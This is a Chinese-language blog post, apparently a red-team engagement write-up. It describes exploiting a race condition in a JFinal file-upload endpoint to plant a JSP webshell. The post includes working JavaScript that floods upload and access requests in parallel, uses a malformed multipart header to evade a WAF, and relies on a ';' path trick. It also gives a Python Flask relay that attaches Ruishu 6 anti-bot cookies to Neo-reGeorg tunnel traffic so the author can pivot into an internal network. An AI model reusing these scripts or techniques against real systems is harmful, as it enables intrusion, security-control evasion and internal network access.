从条件竞争到绕过瑞数6反爬构造正向代理漫游内网

前言

文章主要讲述某次红队攻防项目中,从挖掘某系统0day漏洞拿到shell并通过jfinal框架的某个tips绕过waf,到绕过瑞数6反爬最终构造正向代理漫游内网的过程

漏洞挖掘

前期若干天供应链的艰辛不谈,直接进入到挖洞阶段

拿到手一看代码,发现和目标能对的上的接口少之又少,大概只有两个左右的class中的路由能和目标对的上。扫视一遍lib依赖和web.xml后确定了一些信息:1、目标使用jfinal框架进行开发 2、目标没有能rce的第三方依赖。对目标站点抓包访问了一下,发现了目标的站点不太对劲,因为这个站不能重放包。一开始我以为是银行的那种防重放系统,后面找了专家问了一下,是瑞数反爬虫。这就意味着我们打exp会非常艰难,因为自己构造的exp数据包是过不了瑞数的,打过去会直接返回412的状态码。瑞数反爬的防护下,你的每个请求包都要求带一个cookie,这个cookie都是根据uri动态加密计算的。

到这里为止,环境还是令人绝望的。一两个能对上路由的class文件、有漏洞也不一定打的了的瑞数反爬虫、更恐怖的是就算侥幸rce了,代理应该怎么做。正常人一般就放弃了,但我在上一篇hessian反序列化的博客说过:没有打不死的站,只有不努力的工程师。所以必须梭哈,全力办他!

那么问题来了,在没有第三方能rce依赖下,还能找到什么漏洞呢?我在通篇浏览完少量的代码后,发现了一个上传点,但是这个上传点强制限制了文件内容是jpg,而且后缀使用了白名单。除了这个上传点之外,就没有其他的有用的代码了,其他代码全是业务上的渲染和一些预编译的sql。只能转头看这个上传点,这个上传点和我们平常见的最多的SpringMVC的那种上传很不一样。

image-20231211100107443

上图就是文件上传的一个接口,在后面的代码中我就没看到有文件落地的过程了,那说明从http的请求到文件的写入过程在this.getFiles中

最后一直跟,跟到了jfinal框架里面,在下面的红框中进行了文件写入

image-20231211100505060

image-20231211100542719

image-20231211100601913

image-20231211101427766

那从这里看我好像可以直接写入jsp文件,在我本地环境测试之后发现并没有写进去,然后我就继续看后续的代码,是否做了什么操作

后面发现文件上传完有一个判断isSafeFile的方法

image-20231211101511013

这里检测后缀是不是jsp或者jspx,如果是的话会进行删除

image-20231211101655959

看到这边灵光一现,如果我访问jsp的时机正好在他写入了jsp文件之后,而未来得及删除的时候,那么就能成功的访问到webshell了,从上面代码看显然这个路径是固定的。明显的条件竞争场景。这边漏洞点以及有了,我的exp只要两个数据包,一个数据包上传jsp,一个数据包访问这个jsp即将落地的一个web路径。两个数据包高并发的发出去,在某一时刻就可以获取到shell。

Bypass瑞数反爬虫&&Bypass Waf GetShell

前面说了因为有瑞数,我们的exp是没办法正常的发出去的,后面同事研究了下,如果通过js来调用http的请求,那么这个请求自动会携带瑞数的cookie,这样就能正常的把包发出去了。

通过这个特点,我找chatgpt写了两个js代码

下面的代码的真实url路径我进行了修改

upload.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
fileInput = document.getElementById('fileInput');
file = fileInput.files[0];

function makeRequest(url) {
  return new Promise((resolve, reject) => {
    const xhr = new XMLHttpRequest();
      var fd = new FormData();

fd.append("fileField",file);
    xhr.open('POST', url, true);
    xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=---');


    xhr.onload = function() {
      if (xhr.status >= 200 && xhr.status < 300) {
        resolve(xhr.responseText);
      } else {
        reject(new Error(`HTTP request failed with status ${xhr.status}`));
      }
    };

    xhr.onerror = function() {
      reject(new Error('Network error'));
    };

    xhr.send(fd);
  });
}

 url = '/uploadExample';
concurrency = 10000; // 设置并发请求数

// 创建一组请求
requests = Array.from({ length: concurrency }, () => makeRequest(url));

// 使用Promise.all等待所有请求完成
Promise.all(requests)
  .then(responses => {
    console.log('All requests completed successfully:', responses);
  })
  .catch(error => {
    console.error('One or more requests failed:', error);
  });

get.js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
function makeRequest(url) {
  return new Promise((resolve, reject) => {
    const xhr = new XMLHttpRequest();

    xhr.open('GET', url, true);

    xhr.onload = function() {
      if (xhr.status == 200 && xhr.status == 500) {
        resolve(xhr.responseText);
      } else {
        //reject(new Error(`HTTP request failed with status ${xhr.status}`));
      }
    };

    xhr.onerror = function() {
      //reject(new Error('Network error'));
    };

    xhr.send();
  });
}

url = '/shell.jsp;';
concurrency = 20000; // 设置并发请求数

// 创建一组请求
requests = Array.from({ length: concurrency }, () => makeRequest(url));

// 使用Promise.all等待所有请求完成
Promise.all(requests)
  .then(responses => {
    console.log('All requests completed successfully:', responses);
  })
  .catch(error => {
    console.error('One or more requests failed:', error);
  });

打开F12,先运行upload.js,再打开另外一个浏览器运行get.js,这样就可以模拟瑞数的数据包进行发包了

可以注意到我上面访问webshell的路径为:/shell.jsp;

这里参考:https://forum.butian.net/share/1899,因为jfinal做了限制,正常不能访问jsp文件,但某些版本可以通过;绕过

还有个点是upload.js中有一段代码为

1
xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=---');

这里是绕过waf使用的,因为我构造了畸形的multipart,所以导致waf不能识别到multipart参数中的值,也就绕过了waf。通过我本地测试,这样写在final中是可以正常解析并把文件写入到本地磁盘的。因此这里利用两者解析的差异性绕过了waf。这个绕过也是极少数能用js表达出来的绕过了,不然如果要更多的修改数据包来绕waf的话,js可能就完不成了,也就没办法过瑞数的同时过waf了。

通过大概几千到一万次的访问,最后我访问到了我上传的jsp文件,这个jsp文件的功能为在同目录写入一个专门做文件上传功能的小马,方便我后续稳定的做上传测试。后面我用上传小马传了个命令执行马上去,至此shell就拿下了

Bypass瑞数做正向代理

经过命令执行的探测,发现目标站不出网无法做反向代理。但做正向代理的话,前面又有瑞数,正向代理可没办法用js去一条一条的发包。这里只能正面去刚了,首先我想到的是用python调用selinium或playwright框架去访问目标站,然后模拟js执行来绕过瑞数。但显然我想的简单了,完全绕不过去,都被检测了。后来实在没办法,开始在网上找专门做瑞数解密的人去弄,经过别人研判是最新的瑞数6代,每一个站的加密都是不一样的,因此没有通用工具能破解,只能一个站一套脚本。最后使用钞能力全款拿下了一套脚本。

有个这个脚本后,我们就能做到先调用脚本,获取一个我们要访问的url的加密cookie,把cookie附加到我们的数据包中,这样我们数据包就经过加密,可以正常的抵达到目标服务器的后端了。

下面就是对于neoreg的改造,说实话,在前面的几天中已经花费很多的时间了,到这个时候我已经没心情再去看neoreg哪里调用了http请求,然后再去调用加密给他赋cookie了,因为这样的话我肯定要花时间去理解neoreg的代码并找到每个http请求的地方。很浪费时间。我想了个折中的办法,也就是我用python写一个flask,这个flask的功能是监听8080端口,然后neoreg把流量发给flask监听的8080端口。flask收到了neoreg的流量后,调用瑞数加密的脚本,获取到一个可用的Cookie,把Cookie塞入到flask收到的neoreg的http包中的Cookie位置,然后把整合完毕的包发给目标站。

image-20231211104923308

最后代码大致如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import server
import urllib
from flask import Flask
from flask import request
from flask import Response
import requests
from http.cookiejar import CookieJar
import rs6

# from requests.packages.urllib3.exceptions import InsecureRequestWarning
# requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings()
#requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'
proxies={
    'http':'http://127.0.0.1:8888',
    'https':'http://127.0.0.1:8888',
}

app = Flask(__name__)

url = 'https://xxxxxx:8888/upload/tun.jsp;'

def getRsCookie(url):
    tempCookie=rs6.getCookie(url)
    return tempCookie


@app.route('/<path>',methods=['GET','POST'])
def index(path):
    while(True):
        cookie=getRsCookie(url)
        cookieArr = cookie.split(';')
        cookies = {}
        for cookie in cookieArr:
            keyValue = cookie.split('=')
            cookies[keyValue[0]] = keyValue[1]
        if request.method == 'GET':
            # try:

                res = requests.get(url, verify=False,cookies=cookies,proxies=proxies)
                if res.status_code!=200:
                    continue
                resp = server.Response(res.text)
                return resp
        elif request.method == 'POST':
            data = request.get_data()
            headers = {'Content-Type': 'application/octet-stream'}
            res = requests.post(url, headers=headers, data=data,cookies=cookies,verify=False, proxies=proxies)
            if res.status_code!=200:
                continue
            resp = server.Response(res.text)
            return resp

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=8811)

最后成功打通了代理,顺利进入了内网

总结

漏洞挖掘和漏洞利用同样重要,有洞打不了在一些大型的攻防中比较常见,重要是的能否有灵活的思路去应对以及有一个死磕到底决心。

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

huahua<br><br>虚心学习,不断进步。